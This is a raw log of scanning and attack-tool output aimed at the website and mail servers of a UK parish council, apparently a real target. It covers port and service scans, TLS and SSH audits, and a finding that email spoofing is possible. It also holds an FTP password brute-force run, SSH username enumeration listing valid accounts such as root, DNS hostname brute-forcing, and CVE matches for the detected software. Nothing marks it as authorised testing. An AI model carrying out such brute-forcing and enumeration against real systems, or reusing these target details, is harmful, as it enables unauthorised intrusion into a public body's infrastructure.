- Script Info: |_imap-capabilities: have LOGIN-REFERRALS more SASL-IR listed IDLE LITERAL+ OK post-login capabilities ID ENABLE IMAP4rev1 AUTH=PLAINA0001 Pre-login
- Script Info: | ssl-cert: Subject: commonName=mail.livemail.co.uk/organizationName=Fasthosts Internet Limited/stateOrProvinceName=Gloucestershire/countryName=GB
- Script Info: | Subject Alternative Name: DNS:mail.livemail.co.uk
- Script Info: | Issuer: commonName=Thawte TLS RSA CA G1/organizationName=DigiCert Inc/countryName=US
- Script Info: | Public Key type: rsa
- Script Info: | Public Key bits: 2048
- Script Info: | Signature Algorithm: sha256WithRSAEncryption
- Script Info: | Not valid before: 2018-12-06T00:00:00
- Script Info: | Not valid after: 2020-12-06T12:00:00
- Script Info: | MD5: fa44 ec75 70eb 9d71 2787 1022 09c3 d5f8
- Script Info: |_SHA-1: 869e a9ca a4f4 f83e 1b80 9056 13db 9adc 15de c62d
- Port: 995/tcp open ssl/pop3 syn-ack ttl 57 Dovecot pop3d
- Script Info: |_pop3-capabilities: UIDL RESP-CODES PIPELINING USER AUTH-RESP-CODE SASL(PLAIN) TOP CAPA
- Script Info: | ssl-cert: Subject: commonName=mail.livemail.co.uk/organizationName=Fasthosts Internet Limited/stateOrProvinceName=Gloucestershire/countryName=GB
- Script Info: | Subject Alternative Name: DNS:mail.livemail.co.uk
- Script Info: | Issuer: commonName=Thawte TLS RSA CA G1/organizationName=DigiCert Inc/countryName=US
- Script Info: | Public Key type: rsa
- Script Info: | Public Key bits: 2048
- Script Info: | Signature Algorithm: sha256WithRSAEncryption
- Script Info: | Not valid before: 2018-12-06T00:00:00
- Script Info: | Not valid after: 2020-12-06T12:00:00
- Script Info: | MD5: fa44 ec75 70eb 9d71 2787 1022 09c3 d5f8
- Script Info: |_SHA-1: 869e a9ca a4f4 f83e 1b80 9056 13db 9adc 15de c62d
- Script Info: Device type: general purpose|storage-misc
- IP: 104.47.21.36
- HostName: mundesleypc-gov-uk02c.mail.protection.outlook.com Type: MX
- HostName: mail-lo2gbr010036.inbound.protection.outlook.com Type: PTR
- Country: United States
- Is Active: True (reset ttl 64)
- IP: 134.170.140.0
- Type: SPF
- Is Active: True (reset ttl 64)
- IP: 213.199.154.0
- Type: SPF
- Is Active: True (reset ttl 64)
- IP: 23.103.191.0
- Type: SPF
- Is Active: True (reset ttl 64)
- IP: 40.107.0.0
- Type: SPF
- Is Active: True (reset ttl 64)
- IP: 40.92.0.0
- Type: SPF
- Is Active: True (reset ttl 64)
- IP: 157.56.112.0
- Type: SPF
- Is Active: True (reset ttl 64)
- IP: 207.46.51.64
- Type: SPF
- Is Active: True (reset ttl 64)
- IP: 104.47.0.0
- Type: SPF
- Is Active: True (reset ttl 64)
- IP: 213.199.180.128
- Type: SPF
- Is Active: True (reset ttl 64)
- IP: 217.160.82.244
- HostName: ns2.livedns.co.uk Type: NS
- HostName: ns2.livedns.co.uk Type: PTR
- Country: Germany
- Is Active: True (echo-reply ttl 59)
- Port: 53/tcp open domain syn-ack ttl 59 PowerDNS 3.3 or later
- Script Info: | dns-nsid:
- Script Info: | NSID: dns-pub-nl-ams-nkf03.server.lan (646e732d7075622d6e6c2d616d732d6e6b6630332e7365727665722e6c616e)
- Script Info: | id.server: dns-pub-nl-ams-nkf03.server.lan
- Script Info: |_ bind.version: Served by PowerDNS - https://www.powerdns.com/
- IP: 23.103.200.0
- Type: SPF
- Is Active: True (reset ttl 64)
- IP: 104.47.20.36
- HostName: mundesleypc-gov-uk02c.mail.protection.outlook.com Type: MX
- HostName: mail-cwlgbr010036.inbound.protection.outlook.com Type: PTR
- Country: United States
- Is Active: True (reset ttl 64)
- #######################################################################################################################################
- [+] www.mundesley-pc.gov.uk has no SPF record!
- [*] No DMARC record found. Looking for organizational record
- [+] No organizational DMARC record
- [+] Spoofing possible for www.mundesley-pc.gov.uk!
- #######################################################################################################################################
- Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 03:05 EDT
- Nmap scan report for www.mundesley-pc.gov.uk (89.145.78.0)
- Host is up (0.17s latency).
- rDNS record for 89.145.78.0: pegasus.terrassl.net
- Not shown: 410 filtered ports, 36 closed ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 19/tcp open chargen
- 21/tcp open ftp
- 22/tcp open ssh
- 23/tcp open telnet
- 53/tcp open domain
- 79/tcp open finger
- 80/tcp open http
- 110/tcp open pop3
- 137/tcp open netbios-ns
- 143/tcp open imap
- 407/tcp open timbuktu
- 443/tcp open https
- 465/tcp open smtps
- 587/tcp open submission
- 617/tcp open sco-dtmgr
- 993/tcp open imaps
- 995/tcp open pop3s
- 1158/tcp open lsnr
- 1720/tcp open h323q931
- 1723/tcp open pptp
- 2000/tcp open cisco-sccp
- 2222/tcp open EtherNetIP-1
- 3306/tcp open mysql
- 5000/tcp open upnp
- 5432/tcp open postgresql
- 5900/tcp open vnc
- 6106/tcp open isdninfo
- 6667/tcp open irc
- 7000/tcp open afs3-fileserver
- 8080/tcp open http-proxy
- 8686/tcp open sun-as-jmxrmi
- 8899/tcp open ospf-lite
- 9002/tcp open dynamid
- 9010/tcp open sdr
- 10008/tcp open octopus
- 12345/tcp open netbus
- 22222/tcp open easyengine
- Nmap done: 1 IP address (1 host up) scanned in 10.25 seconds
- #######################################################################################################################################
- Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 03:05 EDT
- Nmap scan report for www.mundesley-pc.gov.uk (89.145.78.0)
- Host is up (0.076s latency).
- rDNS record for 89.145.78.0: pegasus.terrassl.net
- Not shown: 2 filtered ports
- PORT STATE SERVICE
- 53/udp open domain
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 500/udp open|filtered isakmp
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- Nmap done: 1 IP address (1 host up) scanned in 2.03 seconds
- #######################################################################################################################################
- Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 03:05 EDT
- NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
- NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
- NSE: [ftp-brute] passwords: Time limit 3m00s exceeded.
- Nmap scan report for www.mundesley-pc.gov.uk (89.145.78.0)
- Host is up (0.17s latency).
- rDNS record for 89.145.78.0: pegasus.terrassl.net
- PORT STATE SERVICE VERSION
- 21/tcp open ftp Pure-FTPd
- | ftp-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 5835 guesses in 591 seconds, average tps: 9.7
- |_ftp-libopie: ERROR: Script execution failed (use -d to debug)
- |_vulscan: ERROR: Script execution failed (use -d to debug)
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: specialized|WAP|phone
- Running: iPXE 1.X, Linux 2.4.X|2.6.X, Sony Ericsson embedded
- OS CPE: cpe:/o:ipxe:ipxe:1.0.0%2b cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:sonyericsson:u8i_vivaz
- OS details: iPXE 1.0.0+, Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22), Sony Ericsson U8i Vivaz mobile phone
- TRACEROUTE (using port 21/tcp)
- HOP RTT ADDRESS
- 1 65.77 ms 10.245.204.1
- 2 97.61 ms R43.static.amanah.com (104.245.144.129)
- 3 97.64 ms te0-0-2-1.225.nr11.b010988-1.yyz02.atlas.cogentco.com (38.104.156.9)
- 4 97.66 ms te0-0-0-1.agr13.yyz02.atlas.cogentco.com (154.24.54.37)
- 5 97.65 ms te0-9-0-9.ccr31.yyz02.atlas.cogentco.com (154.54.43.141)
- 6 97.67 ms level3.yyz02.atlas.cogentco.com (154.54.11.210)
- 7 ... 8
- 9 161.96 ms GLOBAL-CROS.ear2.London15.Level3.net (64.209.97.98)
- 10 129.17 ms ae2.core-2.maylands.hml.uk.as29017.net (89.145.125.69)
- 11 156.42 ms 83-223-96-109.as29017.net (83.223.96.109)
- 12 158.10 ms be11.asr01.thn.as20860.net (130.180.202.24)
- 13 158.05 ms be10.asr01.dc5.as20860.net (130.180.202.45)
- 14 158.11 ms po256.net2.north.dc5.as20860.net (130.180.203.6)
- 15 158.09 ms 1-103-223-83.xssl.net (83.223.103.1)
- 16 ... 30
- #######################################################################################################################################
- # general
- (gen) banner: SSH-2.0-OpenSSH_7.4
- (gen) software: OpenSSH 7.4
- (gen) compatibility: OpenSSH 7.3+ (some functionality from 6.6), Dropbear SSH 2016.73+ (some functionality from 0.52)
- (gen) compression: enabled ([email protected])
- # key exchange algorithms
- (kex) curve25519-sha256 -- [warn] unknown algorithm
- (kex) [email protected] -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
- `- [info] available since OpenSSH 4.4
- (kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
- (kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3
- (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0
- (kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
- (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
- (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- # host-key algorithms
- (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
- (key) rsa-sha2-512 -- [info] available since OpenSSH 7.2
- (key) rsa-sha2-256 -- [info] available since OpenSSH 7.2
- (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (key) ssh-ed25519 -- [info] available since OpenSSH 6.5
- # encryption algorithms (ciphers)
- (enc) [email protected] -- [info] available since OpenSSH 6.5
- `- [info] default cipher since OpenSSH 6.9.
- (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes192-ctr -- [info] available since OpenSSH 3.7
- (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) [email protected] -- [info] available since OpenSSH 6.2
- (enc) [email protected] -- [info] available since OpenSSH 6.2
- (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
- (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled since Dropbear SSH 0.53
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 2.1.0
- (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- # message authentication code algorithms
- (mac) [email protected] -- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 6.2
- (mac) [email protected] -- [info] available since OpenSSH 6.2
- (mac) [email protected] -- [info] available since OpenSSH 6.2
- (mac) [email protected] -- [info] available since OpenSSH 6.2
- (mac) [email protected] -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 6.2
- (mac) [email protected] -- [warn] using encrypt-and-MAC mode
- `- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 4.7
- (mac) [email protected] -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 6.2
- (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- # algorithm recommendations (for OpenSSH 7.4)
- (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove
- (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
- (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
- (rec) -blowfish-cbc -- enc algorithm to remove
- (rec) -3des-cbc -- enc algorithm to remove
- (rec) -aes256-cbc -- enc algorithm to remove
- (rec) -cast128-cbc -- enc algorithm to remove
- (rec) -aes192-cbc -- enc algorithm to remove
- (rec) -aes128-cbc -- enc algorithm to remove
- (rec) -hmac-sha2-512 -- mac algorithm to remove
- (rec) [email protected] -- mac algorithm to remove
- (rec) -hmac-sha2-256 -- mac algorithm to remove
- (rec) [email protected] -- mac algorithm to remove
- (rec) -hmac-sha1 -- mac algorithm to remove
- (rec) [email protected] -- mac algorithm to remove
- (rec) [email protected] -- mac algorithm to remove
- #######################################################################################################################################
- Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 03:16 EDT
- Nmap scan report for www.mundesley-pc.gov.uk (89.145.78.0)
- Host is up (0.13s latency).
- rDNS record for 89.145.78.0: pegasus.terrassl.net
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
- |_ssh-auth-methods: ERROR: Script execution failed (use -d to debug)
- |_ssh-brute: ERROR: Script execution failed (use -d to debug)
- |_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
- |_ssh-run: ERROR: Script execution failed (use -d to debug)
- | vulners:
- | cpe:/a:openbsd:openssh:7.4:
- | CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
- |_ CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
- |_vulscan: ERROR: Script execution failed (use -d to debug)
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose
- Running: Linux 2.6.X
- OS CPE: cpe:/o:linux:linux_kernel:2.6
- OS details: Linux 2.6.18 - 2.6.22
- TRACEROUTE (using port 22/tcp)
- HOP RTT ADDRESS
- 1 64.44 ms 10.245.204.1
- 2 96.08 ms R43.static.amanah.com (104.245.144.129)
- 3 96.18 ms te0-0-2-1.225.nr11.b010988-1.yyz02.atlas.cogentco.com (38.104.156.9)
- 4 96.17 ms te0-0-0-1.agr13.yyz02.atlas.cogentco.com (154.24.54.37)
- 5 96.15 ms te0-9-0-9.ccr31.yyz02.atlas.cogentco.com (154.54.43.141)
- 6 96.17 ms level3.yyz02.atlas.cogentco.com (154.54.11.210)
- 7 ... 8
- 9 161.39 ms GYRON-INTER.ear2.London15.Level3.net (64.209.96.150)
- 10 128.14 ms ae2.core-2.maylands.hml.uk.as29017.net (89.145.125.69)
- 11 123.04 ms 83-223-96-111.as29017.net (83.223.96.111)
- 12 180.28 ms be11.asr01.thn.as20860.net (130.180.202.24)
- 13 180.28 ms be10.asr02.dc5.as20860.net (130.180.202.47)
- 14 145.73 ms po256.net1.north.dc5.as20860.net (130.180.203.4)
- 15 180.24 ms 1-103-223-83.xssl.net (83.223.103.1)
- 16 ... 30
- #######################################################################################################################################
- USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
- RHOSTS => www.mundesley-pc.gov.uk
- RHOST => www.mundesley-pc.gov.uk
- [*] 89.145.78.0:22 - SSH - Using malformed packet technique
- [*] 89.145.78.0:22 - SSH - Starting scan
- [-] 89.145.78.0:22 - SSH - User 'admin' on could not connect
- [-] 89.145.78.0:22 - SSH - User 'administrator' on could not connect
- [-] 89.145.78.0:22 - SSH - User 'anonymous' on could not connect
- [-] 89.145.78.0:22 - SSH - User 'backup' on could not connect
- [-] 89.145.78.0:22 - SSH - User 'bee' on could not connect
- [-] 89.145.78.0:22 - SSH - User 'ftp' on could not connect
- [-] 89.145.78.0:22 - SSH - User 'guest' on could not connect
- [-] 89.145.78.0:22 - SSH - User 'GUEST' on could not connect
- [-] 89.145.78.0:22 - SSH - User 'info' on could not connect
- [-] 89.145.78.0:22 - SSH - User 'mail' on could not connect
- [+] 89.145.78.0:22 - SSH - User 'mailadmin' found
- [+] 89.145.78.0:22 - SSH - User 'msfadmin' found
- [+] 89.145.78.0:22 - SSH - User 'mysql' found
- [+] 89.145.78.0:22 - SSH - User 'nobody' found
- [+] 89.145.78.0:22 - SSH - User 'oracle' found
- [+] 89.145.78.0:22 - SSH - User 'owaspbwa' found
- [+] 89.145.78.0:22 - SSH - User 'postfix' found
- [+] 89.145.78.0:22 - SSH - User 'postgres' found
- [+] 89.145.78.0:22 - SSH - User 'private' found
- [+] 89.145.78.0:22 - SSH - User 'proftpd' found
- [+] 89.145.78.0:22 - SSH - User 'public' found
- [+] 89.145.78.0:22 - SSH - User 'root' found
- [+] 89.145.78.0:22 - SSH - User 'superadmin' found
- [+] 89.145.78.0:22 - SSH - User 'support' found
- [-] 89.145.78.0:22 - SSH - User 'sys' on could not connect
- [-] 89.145.78.0:22 - SSH - User 'system' on could not connect
- [-] 89.145.78.0:22 - SSH - User 'systemadmin' on could not connect
- [-] 89.145.78.0:22 - SSH - User 'systemadministrator' on could not connect
- [-] 89.145.78.0:22 - SSH - User 'test' on could not connect
- [-] 89.145.78.0:22 - SSH - User 'tomcat' on could not connect
- [-] 89.145.78.0:22 - SSH - User 'user' on could not connect
- [-] 89.145.78.0:22 - SSH - User 'webmaster' on could not connect
- [-] 89.145.78.0:22 - SSH - User 'www-data' on could not connect
- [-] 89.145.78.0:22 - SSH - User 'Fortimanager_Access' on could not connect
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- #######################################################################################################################################
- Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 03:33 EDT
- Nmap scan report for www.mundesley-pc.gov.uk (89.145.78.0)
- Host is up.
- rDNS record for 89.145.78.0: pegasus.terrassl.net
- PORT STATE SERVICE VERSION
- 23/tcp filtered telnet
- Too many fingerprints match this host to give specific OS details
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 68.42 ms 10.245.204.1
- 2 100.68 ms R43.static.amanah.com (104.245.144.129)
- 3 100.73 ms te0-0-2-1.225.nr11.b010988-1.yyz02.atlas.cogentco.com (38.104.156.9)
- 4 100.75 ms te0-0-0-1.agr14.yyz02.atlas.cogentco.com (154.24.54.41)
- 5 100.73 ms te0-9-1-9.ccr31.yyz02.atlas.cogentco.com (154.54.43.161)
- 6 100.75 ms level3.yyz02.atlas.cogentco.com (154.54.11.210)
- 7 ... 8
- 9 167.06 ms GYRON-INTER.ear2.London15.Level3.net (64.209.96.150)
- 10 134.08 ms ae2.core-2.maylands.hml.uk.as29017.net (89.145.125.69)
- 11 129.24 ms 83-223-96-111.as29017.net (83.223.96.111)
- 12 182.98 ms be11.asr01.thn.as20860.net (130.180.202.24)
- 13 182.92 ms be10.asr01.dc5.as20860.net (130.180.202.45)
- 14 150.61 ms po256.net1.north.dc5.as20860.net (130.180.203.4)
- 15 182.95 ms 1-103-223-83.xssl.net (83.223.103.1)
- 16 ... 30
- #######################################################################################################################################
- Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 03:34 EDT
- Nmap scan report for www.mundesley-pc.gov.uk (89.145.78.0)
- Host is up.
- rDNS record for 89.145.78.0: pegasus.terrassl.net
- PORT STATE SERVICE VERSION
- 53/tcp filtered domain
- Too many fingerprints match this host to give specific OS details
- Host script results:
- | dns-brute:
- | DNS Brute-force hostnames:
- | www.mundesley-pc.gov.uk - 89.145.78.0
- | mail.mundesley-pc.gov.uk - 213.171.216.40
- |_ smtp.mundesley-pc.gov.uk - 213.171.216.50
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 64.17 ms 10.245.204.1
- 2 96.03 ms R43.static.amanah.com (104.245.144.129)
- 3 96.07 ms te0-0-2-1.225.nr11.b010988-1.yyz02.atlas.cogentco.com (38.104.156.9)
- 4 96.09 ms te0-0-0-1.agr14.yyz02.atlas.cogentco.com (154.24.54.41)
- 5 96.07 ms te0-9-1-9.ccr31.yyz02.atlas.cogentco.com (154.54.43.161)
- 6 96.11 ms level3.yyz02.atlas.cogentco.com (154.54.11.210)
- 7 ... 8
- 9 160.37 ms GYRON-INTER.ear2.London15.Level3.net (64.209.96.150)
- 10 127.82 ms ae2.core-2.maylands.hml.uk.as29017.net (89.145.125.69)
- 11 140.47 ms 83-223-96-111.as29017.net (83.223.96.111)
- 12 180.85 ms be11.asr01.thn.as20860.net (130.180.202.24)
- 13 180.85 ms be10.asr01.dc5.as20860.net (130.180.202.45)
- 14 144.96 ms po256.net1.north.dc5.as20860.net (130.180.203.4)
- 15 180.84 ms 1-103-223-83.xssl.net (83.223.103.1)
- 16 ... 30
- #######################################################################################################################################
- Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 03:34 EDT
- Nmap scan report for www.mundesley-pc.gov.uk (89.145.78.0)
- Host is up.
- rDNS record for 89.145.78.0: pegasus.terrassl.net
- PORT STATE SERVICE VERSION
- 79/tcp filtered finger
- Too many fingerprints match this host to give specific OS details
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 64.54 ms 10.245.204.1
- 2 96.16 ms R43.static.amanah.com (104.245.144.129)
- 3 96.16 ms te0-0-2-1.225.nr11.b010988-1.yyz02.atlas.cogentco.com (38.104.156.9)
- 4 96.16 ms te0-0-0-1.agr14.yyz02.atlas.cogentco.com (154.24.54.41)
- 5 96.16 ms te0-9-1-9.ccr31.yyz02.atlas.cogentco.com (154.54.43.161)
- 6 96.19 ms level3.yyz02.atlas.cogentco.com (154.54.11.210)
- 7 115.89 ms ae-13-3511.ear2.London15.Level3.net (4.69.167.146)
- 8 189.77 ms ae-13-3511.ear2.London15.Level3.net (4.69.167.146)
- 9 160.69 ms GYRON-INTER.ear2.London15.Level3.net (64.209.96.150)
- 10 128.65 ms ae2.core-2.maylands.hml.uk.as29017.net (89.145.125.69)
- 11 156.97 ms 83-223-96-111.as29017.net (83.223.96.111)
- 12 159.43 ms be11.asr01.thn.as20860.net (130.180.202.24)
- 13 159.37 ms be10.asr01.dc5.as20860.net (130.180.202.45)
- 14 159.32 ms po256.net1.north.dc5.as20860.net (130.180.203.4)
- 15 159.37 ms 1-103-223-83.xssl.net (83.223.103.1)
- 16 ... 30
- #######################################################################################################################################
- Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 03:34 EDT
- NSE: Loaded 164 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 03:34
- Completed NSE at 03:34, 0.00s elapsed
- Initiating NSE at 03:34
- Completed NSE at 03:34, 0.00s elapsed
- Initiating Parallel DNS resolution of 1 host. at 03:34
- Completed Parallel DNS resolution of 1 host. at 03:34, 0.02s elapsed
- Initiating SYN Stealth Scan at 03:34
- Scanning www.mundesley-pc.gov.uk (89.145.78.0) [1 port]
- Completed SYN Stealth Scan at 03:34, 0.54s elapsed (1 total ports)
- Initiating Service scan at 03:34
- Initiating OS detection (try #1) against www.mundesley-pc.gov.uk (89.145.78.0)
- Retrying OS detection (try #2) against www.mundesley-pc.gov.uk (89.145.78.0)
- Initiating Traceroute at 03:35
- Completed Traceroute at 03:35, 6.21s elapsed
- Initiating Parallel DNS resolution of 14 hosts. at 03:35
- Completed Parallel DNS resolution of 14 hosts. at 03:35, 0.18s elapsed
- NSE: Script scanning 89.145.78.0.
- Initiating NSE at 03:35
- Completed NSE at 03:35, 0.35s elapsed
- Initiating NSE at 03:35
- Completed NSE at 03:35, 0.00s elapsed
- Nmap scan report for www.mundesley-pc.gov.uk (89.145.78.0)
- Host is up.
- rDNS record for 89.145.78.0: pegasus.terrassl.net
- PORT STATE SERVICE VERSION
- 80/tcp filtered http
- Too many fingerprints match this host to give specific OS details
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 64.51 ms 10.245.204.1
- 2 96.19 ms R43.static.amanah.com (104.245.144.129)
- 3 96.24 ms te0-0-2-1.225.nr11.b010988-1.yyz02.atlas.cogentco.com (38.104.156.9)
- 4 96.28 ms te0-0-0-1.agr14.yyz02.atlas.cogentco.com (154.24.54.41)
- 5 96.25 ms te0-9-1-9.ccr31.yyz02.atlas.cogentco.com (154.54.43.161)
- 6 96.29 ms level3.yyz02.atlas.cogentco.com (154.54.11.210)
- 7 172.27 ms ae-13-3511.ear2.London15.Level3.net (4.69.167.146)
- 8 172.26 ms ae-13-3511.ear2.London15.Level3.net (4.69.167.146)
- 9 172.30 ms GYRON-INTER.ear2.London15.Level3.net (64.209.96.150)
- 10 172.31 ms ae2.core-2.maylands.hml.uk.as29017.net (89.145.125.69)
- 11 133.23 ms 83-223-96-111.as29017.net (83.223.96.111)
- 12 194.87 ms be11.asr01.thn.as20860.net (130.180.202.24)
- 13 194.81 ms be10.asr01.dc5.as20860.net (130.180.202.45)
- 14 162.54 ms po256.net1.north.dc5.as20860.net (130.180.203.4)
- 15 194.81 ms 1-103-223-83.xssl.net (83.223.103.1)
- 16 ... 30
- NSE: Script Post-scanning.
- Initiating NSE at 03:35
- Completed NSE at 03:35, 0.00s elapsed
- Initiating NSE at 03:35
- Completed NSE at 03:35, 0.00s elapsed
- #######################################################################################################################################
- HTTP/1.1 403 Forbidden
- Connection: close
- Cache-Control: no-cache, no-store, must-revalidate
- Pragma: no-cache
- Expires: 0
- Server: Apache/2.2.16 (Debian)
- Content-Length: 188986
- HTTP/1.1 403 Forbidden
- Connection: close
- Cache-Control: no-cache, no-store, must-revalidate
- Pragma: no-cache
- Expires: 0
- Server: Apache/2.2.16 (Debian)
- Content-Length: 188986
- #######################################################################################################################################
- Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 03:38 EDT
- Nmap scan report for www.mundesley-pc.gov.uk (89.145.78.0)
- Host is up (0.20s latency).
- rDNS record for 89.145.78.0: pegasus.terrassl.net
- PORT STATE SERVICE VERSION
- 110/tcp filtered pop3
- Too many fingerprints match this host to give specific OS details
- Network Distance: 16 hops
- TRACEROUTE (using port 80/tcp)
- HOP RTT ADDRESS
- 1 107.44 ms 10.245.204.1
- 2 140.33 ms R43.static.amanah.com (104.245.144.129)
- 3 140.40 ms te0-0-2-1.225.nr11.b010988-1.yyz02.atlas.cogentco.com (38.104.156.9)
- 4 140.42 ms te0-0-0-1.agr14.yyz02.atlas.cogentco.com (154.24.54.41)
- 5 140.39 ms te0-9-1-9.ccr31.yyz02.atlas.cogentco.com (154.54.43.161)
- 6 140.41 ms level3.yyz02.atlas.cogentco.com (154.54.11.210)
- 7 113.60 ms ae-12-3510.ear2.London15.Level3.net (4.69.167.142)
- 8 189.68 ms ae-12-3510.ear2.London15.Level3.net (4.69.167.142)
- 9 191.30 ms GYRON-INTER.ear2.London15.Level3.net (64.209.96.150)
- 10 140.52 ms ae2.core-1.maylands.hml.uk.as29017.net (89.145.125.77)
- 11 137.99 ms 83-223-96-111.as29017.net (83.223.96.111)
- 12 193.17 ms be11.asr01.ld5.as20860.net (130.180.202.26)
- 13 193.12 ms be10.asr02.dc5.as20860.net (130.180.202.47)
- 14 161.14 ms po256.net1.north.dc5.as20860.net (130.180.203.4)
- 15 193.12 ms 1-103-223-83.xssl.net (83.223.103.1)
- 16 193.03 ms pegasus.terrassl.net (89.145.78.0)
- #######################################################################################################################################
- Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 03:40 EDT
- Nmap scan report for www.mundesley-pc.gov.uk (89.145.78.0)
- Host is up (0.15s latency).
- rDNS record for 89.145.78.0: pegasus.terrassl.net
- PORT STATE SERVICE VERSION
- 137/tcp open ftp ProFTPD 1.3.1
- | vulners:
- | cpe:/a:proftpd:proftpd:1.3.1:
- | CVE-2011-4130 9.0 https://vulners.com/cve/CVE-2011-4130
